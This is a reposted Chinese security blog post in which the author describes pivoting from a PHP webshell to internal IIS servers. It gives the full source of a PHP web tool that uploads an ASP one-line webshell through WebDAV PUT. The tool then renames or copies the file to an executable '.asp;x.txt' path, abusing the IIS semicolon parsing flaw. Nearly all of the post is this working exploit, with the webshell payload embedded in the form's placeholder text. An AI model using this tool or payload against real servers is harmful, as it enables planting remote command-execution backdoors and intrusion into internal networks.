PHP

Put漏洞利用工具PHP在线版

字号+ 作者:secoff 来源:转载 2017-03-15 09:33 我要评论( )

在webshell上探测到内网几个开了put的iis由于防火墙的原因没有交互式环境,情急之下随手用php写了个简易的利用工具(因为webshell是php的)。 代码如下: 1 2 3 4 ......

在webshell上探测到内网几个开了put的iis由于防火墙的原因没有交互式环境,情急之下随手用php写了个简易的利用工具(因为webshell是php的)。

代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
<?php

error_reporting(0);
$des = '';
$url = 'http://192.168.8.88/b4dboy.txt';

function put($url, $shellcode) {
	$options = array(
		'http' => array(
			'method' => 'PUT',
			'content' => $shellcode,
		)
	);
	$context = @stream_context_create($options);
	return @file_get_contents($url, false, $context);
}

function exploit($url, $dest, $move = 1) {
	global $des;
	$options = array(
		'http' => array(
			'method' => ($move ? 'MOVE' : 'COPY'),
			'header' => 'Destination: '.$dest,
		)
	);
	$des = $dest;
	$context = @stream_context_create($options);
	return @file_get_contents($url, false, $context);
}

if(!empty($_POST)) {
	$url = $_POST['url'];
	$method = $_POST['method'];
	$shellcode = $_POST['exp'];
	$destination = $_POST['exp'];

	$result = '';
	if($method == '1') {
		$result = put($url, $shellcode);

	} elseif($method == '2') {
		$result = exploit($url, $destination);

	} elseif($method == '3') {
		$result = exploit($url, $destination, 0);
	}
	#debug
	#print_r($result);
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="description" content="">
	<meta name="author" content="">
	<style>td{border:1px solid #ccc;text-align:right;padding: 5px 15px;}input{width:100%;}</style>
	<script type="text/javascript">
		function selectMethod(obj) {
			var desc = document.getElementById("desc");
			var val = document.getElementById("val");
			if(obj.value == '1') {
				desc.innerHTML = 'Shellcode: ';
				val.innerHTML = '<input type="text" name="exp" placeholder="<%execute request("b4dboy")%>" />';
			} else {
				desc.innerHTML = 'Destination: ';
				val.innerHTML = '<input type="text" name="exp" placeholder="http://192.168.8.88/b4dboy.asp;x.txt" />';
			}
		}
	</script>
	<title>IIS PUT</title>
</head>

<body>
	<div style="text-align:center;padding:50px;">
		<form action="" method="post">
		<table align="center">
			<tr>
				<td>Url: </td>
				<td colspan="2" width="380px;">
					<input id="url" type="text" value="<?php echo $url;?>" name="url" />
				</td>
				<td>Method: </td>
				<td width="86px;">
					<select name="method" onchange="selectMethod(this)">
						<option value="1">PUT</option>
						<option value="2">MOVE</option>
						<option value="3">COPY</option>
					</select>
				</td>
			</tr>
			<tr>
				<td id="desc">Shellcode:</td>
				<td colspan="3" id="val">
					<input type='text' name='exp' placeholder='<%execute request("b4dboy")%>' />
				</td>
				<td>
					<input type="submit" value="Submit" />
				</td>
			</tr>
			<tr>
				<td>Result: </td>
				<td colspan="4" style="text-align:center;"><?php echo $des;?></td>
			</tr>
		</table>
		</form>
	</div>
</body>
</html>

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Php/615.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~